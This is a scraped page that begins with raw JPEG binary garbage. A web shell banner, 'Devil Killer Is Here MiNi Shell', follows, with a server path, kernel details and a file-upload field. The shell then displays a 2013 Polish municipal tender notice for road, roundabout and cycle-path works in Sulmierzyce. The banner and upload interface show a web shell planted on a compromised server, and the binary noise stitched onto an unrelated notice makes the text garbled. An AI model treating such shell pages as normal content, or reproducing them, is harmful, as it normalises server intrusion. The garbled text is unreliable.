JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130121/29236-N-2013.html

<p class="kh_header"><b>Sulmierzyce: Rozbudowa dróg powiatowych nr 1500 E i 1901 E w Sulmierzycach w zakresie budowy ronda wraz           z urządzeniami infrastruktury technicznej, budowy chodnika, wjazdów i ciągu pieszo - rowerowego oraz przebudowa drogi powiatowej nr 1500 E na odcinku Sulmierzyce - Antoniówka w zakresie budowy ścieżki pieszo - rowerowej (etap I) i ciągu pieszo - rowerowego (etap II, III i IV)</b><br>
<b>Numer ogłoszenia: 29236 - 2013; data zamieszczenia: 21.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulmierzyce , ul. Urzędowa 1, 98-338 Sulmierzyce, woj. łódzkie, tel. 44 6846056, faks 44 6846057.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulmierzyce.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa dróg powiatowych nr 1500 E i 1901 E w Sulmierzycach w zakresie budowy ronda wraz           z urządzeniami infrastruktury technicznej, budowy chodnika, wjazdów i ciągu pieszo - rowerowego oraz przebudowa drogi powiatowej nr 1500 E na odcinku Sulmierzyce - Antoniówka w zakresie budowy ścieżki pieszo - rowerowej (etap I) i ciągu pieszo - rowerowego (etap II, III i IV).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  rozbudowa dróg powiatowych nr 1500 E i 1901 E w Sulmierzycach w zakresie budowy ronda wraz z urządzeniami infrastruktury technicznej, budowy chodnika, wjazdów i ciągu pieszo - rowerowego oraz przebudowa drogi powiatowej nr 1500 E na odcinku Sulmierzyce - Antoniówka w zakresie budowy ścieżki pieszo - rowerowej (etap I) i ciągu pieszo - rowerowego (etap II, III i IV) obejmująca:
Zadanie 1:
Rozbudowa dróg powiatowych nr 1500 E i 1901 E w Sulmierzycach w zakresie budowy ronda wraz z urządzeniami infrastruktury technicznej, budowy chodnika, wjazdów i ciągu pieszo - rowerowego.
Zakres zamówienia obejmuje:
1) budowę ronda o średnicy zewnętrznej 32,0 m (średnica wyspy środkowej 15,0 m), kategoria ruchu KR 4
2) budowę chodnika o szerokości 2,0 m lub do granicy pasa drogowego
3) budowę ciągu pieszo - rowerowego o szerokości 2,5 m bezpośrednio przy jezdni
4) wymianę kostki betonowej na schodach oraz podestach przy wejściach do sklepów
5) budowę jednego nowego zjazdu oraz przebudowę 10 istniejących zjazdów
6) budowę kanalizacji deszczowej wraz z wpustami ulicznymi
7) budowę kablowej linii oświetlenia ulicznego przy ul. Szkolnej oraz oświetlenia ulicznego ronda
8) budowę elektroenergetycznej linii kablowej 0,4 kV oraz demontaż napowietrznej linii elektroenergetycznej 0,4 kV kolidującej z układem drogowym przy ul. Szkolnej 
9) budowę kanalizacji kablowej telekomunikacyjnej
Uwaga:
Zamawiający wyłącza z zakresu robót wskazanego w dokumentacji projektowej odbudowę ogrodzenia wzdłuż placu kościelnego.
Roboty należy wykonać zgodnie z projektem budowlano-wykonawczym dot. branży komunikacyjnej, projektami budowlanymi dot. branży elektrycznej oraz projektem budowlanym  dot. branży telekomunikacyjnej.
Zadanie 2:
Przebudowa drogi powiatowej nr 1500 E na odcinku Sulmierzyce - Antoniówka w zakresie budowy ścieżki pieszo - rowerowej (etap I) i ciągu pieszo - rowerowego (etap II, III i IV)
Zakres zamówienia obejmuje:
1) Etap I - budowa ścieżki rowerowej o szerokości 2,0 m oraz odtworzenie istniejących zjazdów i przepustów -odcinek o długości 787,50 m
2) Etap II - budowa ciągu pieszo - rowerowego o szerokości 2,5 m (lokalne zwężenie                   do 2,0 m) oraz odtworzenie istniejących zjazdów - -odcinek o długości 946,00 m
3) Etap III - budowa ciągu pieszo - rowerowego o szerokości 2,5 m (lokalne zwężenie do 1,5 m) oraz odtworzenie istniejących zjazdów i przepustów - odcinek o długości 950,00 m
4) Etap II - budowa ciągu pieszo - rowerowego o szerokości 2,5 m oraz odtworzenie istniejących zjazdów - odcinek o długości 930,00 m
Szczegółowy opis przedmiotu zamówienia stanowią:
Dla Zadania 1:
1) przedmiary robót (branża drogowa, kanalizacyjna, elektryczna i telekomunikacyjna) - dodatek nr 7 do SIWZ,
2) szczegółowe specyfikacje techniczne wykonania i odbioru robót (branża drogowa, kanalizacyjna, elektryczna i telekomunikacyjna) - dodatek nr 8 do SIWZ,
3) projekt budowlano - wykonawczy (branża drogowa) - dodatek nr 9 do SIWZ,
4) projekt docelowej organizacji ruchu - dodatek nr 10 do SIWZ,
5) projekty budowlane (branża elektryczna) - dodatek nr 11 do SIWZ,
6) projekt budowlany i wykonawczy (branża telekomunikacyjna) - dodatek nr 12 do SIWZ,
Dla Zadania 2:
1) przedmiary robót (dla każdego z etapów odrębnie) - dodatek nr 13 do SIWZ,
2) szczegółowe specyfikacje techniczne wykonania i odbioru robót (dla każdego z etapów odrębnie) - dodatek nr 14 do SIWZ
3) projekty budowlane (dla każdego z etapów odrębnie) - dodatek nr 15 do SIWZ,
Uwaga:
Przedmiary robót zostały załączone w celach informacyjnych i służą jedynie do opisu przedmiotu zamówienia. Nie stanowią one podstawy do obliczenia ceny przez Wykonawcę. 
Zamawiający informuje, iż wszędzie tam gdzie w dokumentacji projektowej użyte zostały nazwy własne producentów urządzeń, materiałów mają one charakter przykładowy. Dopuszcza się składanie ofert zawierających urządzenia/materiały innych producentów  niż  wskazane                        w dokumentacji projektowej tj. urządzenia/materiały równoważne o nie gorszych parametrach technicznych i technologicznych pod warunkiem, że zagwarantują one realizację robót w zgodzie          z wydanym pozwoleniem na budowę lub zgłoszeniem oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej. Wykonawca, który powołuje się na rozwiązania równoważne do opisanych przez Zamawiającego ma obowiązek wykazać, że oferowane przez niego urządzenia/materiały spełniają wymagania określone przez Zamawiającego. W tym celu Wykonawca zobowiązany jest załączyć do oferty: 
1) wykaz proponowanych urządzeń/materiałów równoważnych (z podaniem nazwy, typu oraz producenta)
2) oświadczenie, że zastosowane rozwiązanie/rozwiązania równoważne zagwarantują realizację robót w zgodzie z wydanym pozwoleniem na budowę lub zgłoszeniem oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej
3) szczegółową dokumentację techniczną  urządzeń/materiałów  równoważnych (zawierającą opis parametrów technicznych, użytkowych, funkcjonalnych)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.11.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 70.000,00 zł (słownie: siedemdziesiąt tysięcy                        złotych 00/100). Wadium musi być wniesione przed upływem terminu składania ofert wskazanego w Sekcji IV pkt. IV.4.4) niniejszego ogłoszenia. Wykonawca może wnieść wadium w formach wskazanych                        w Rozdziale  8 Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, iż wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli  okres prowadzenia działalności jest krótszy w tym okresie 
1) minimum 3 roboty budowlane polegające na budowie drogi wraz z budową ronda oraz budową infrastruktury technicznej tj. odwodnienie i oświetlenie o łącznej wartości nie mniejszej niż 2.500.000,00 zł brutto w tym min. jedna inwestycja wykonana na drodze klasy nie niższej niż                   Z i kategorii ruchu nie mniejszej niż KR4 z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
i
2) minimum 2 roboty budowlane polegające na budowie ścieżki rowerowej i/lub ciągu pieszo              - rowerowego o łącznej wartości nie mniejszej niż 500.000,00 zł brutto z podaniem ich rodzaju             i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia tj. 
1) co najmniej jedną osobą, która pełnić będzie funkcję kierownika budowy (branża drogowa) posiadającą określone przepisami ustawy Prawo budowlane (t.j. Dz. U. z 2010r. Nr 243, poz. 1623 ze zm.) uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie wymaganym do realizacji niniejszego zamówienia z aktualną przynależnością do właściwej izby samorządu zawodowego,
2) co najmniej jedną osobą, która pełnić będzie funkcję kierownika robót (branża wod-kan) posiadającą określone przepisami ustawy Prawo budowlane (tj. Dz. U. z 2010r. Nr 243, poz. 1623 ze zm.) uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych co najmniej w ograniczonym zakresie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie niezbędnym do realizacji przedmiotowego zamówienia z aktualną przynależnością do właściwej izby samorządu zawodowego,
3) co najmniej jedną osobą, która pełnić będzie funkcję kierownika robót (branża telekomunikacyjna) posiadającą określone przepisami ustawy Prawo budowlane (t.j. Dz. U. z 2010r. Nr 243, poz. 1623 ze zm.) uprawnienia do kierowania robotami budowlanymi w specjalności telekomunikacyjnej                 w zakresie telekomunikacji przewodowej wraz z infrastrukturą telekomunikacyjną bez ograniczeń lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie wymaganym do realizacji niniejszego zamówienia z aktualną przynależnością do właściwej izby samorządu zawodowego,
4) co najmniej jedną osobą, która pełnić będzie funkcję kierownika robót (branża elektryczna) posiadającą: 
a) określone przepisami ustawy Prawo budowlane (t.j. Dz. U. z 2010r. Nr 243, poz. 1623 ze zm.) uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji  i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do pełnienia funkcji kierownika robót w zakresie wymaganym do realizacji niniejszego zamówienia z aktualną przynależnością do właściwej izby samorządu zawodowego,
b) ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji na stanowisku dozoru D w zakresie obsługi, konserwacji, remontów, montażu, kontrolno - pomiarowym dla następujących urządzeń, instalacji i sieci:
urządzenia, instalacje i sieci elektroenergetyczne o napięciu wyższym niż 1 kV do 20 kV,
aparatura kontrolno - pomiarowa oraz urządzenia i instalacje automatycznej regulacji, sterowania i zabezpieczeń w/w urządzeń i instalacji,
5) co najmniej jedną osobą, która realizować będzie roboty (branża elektryczna) posiadającą ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji na stanowisku eksploatacji E w zakresie obsługi, konserwacji, remontów, montażu, kontrolno - pomiarowym dla następujących urządzeń, instalacji i sieci:
urządzenia, instalacje i sieci elektroenergetyczne o napięciu wyższym niż 1 kV do 20 kV,
aparatura kontrolno - pomiarowa oraz urządzenia i instalacje automatycznej regulacji, sterowania i zabezpieczeń w/w urządzeń i instalacji,
Uwaga:
Wykonawca w celu wykazania spełniania w/w warunku może wskazać osobę będącą obywatelem państwa członkowskiego, która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, pod warunkiem, że osoba ta  posiada decyzję o uznaniu kwalifikacji zawodowych            i prawo wykonywania samodzielnych funkcji technicznych w budownictwie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej wykonawcy zostanie uznany za spełniony, jeżeli wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową w kwocie nie mniejszej niż 3.000.000,00 zł.
Uwaga:
Wartości podane w walutach innych niż wskazane przez Zamawiającego wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć
1) Oświadczenie, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego - złożone np. w treści formularza ofertowego,
W celu potwierdzenia, że oferowane  urządzenia/materiały odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda (dotyczy Wykonawców którzy  powołują się na rozwiązania równoważne opisywanym przez Zamawiającego):
1) wykaz proponowanych urządzeń/materiałów równoważnych (z podaniem nazwy, typu oraz producenta)
2) oświadczenie, że zastosowane rozwiązanie/rozwiązania równoważne zagwarantują realizację robót w zgodzie z wydanym pozwoleniem na budowę lub zgłoszeniem oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej
3) szczegółową dokumentację techniczną  urządzeń/materiałów  równoważnych (zawierającą opis parametrów technicznych, użytkowych, funkcjonalnych).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu oryginał dokumentu pisemnego zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Treść zobowiązania podmiotu trzeciego powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu trzeciego, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane, w tym jakiego okresu dotyczy, a w sytuacji gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielania ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
2. Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu wymienione w Sekcji III. pkt III.4) ppkt III.4.2) niniejszego ogłoszenia</p>
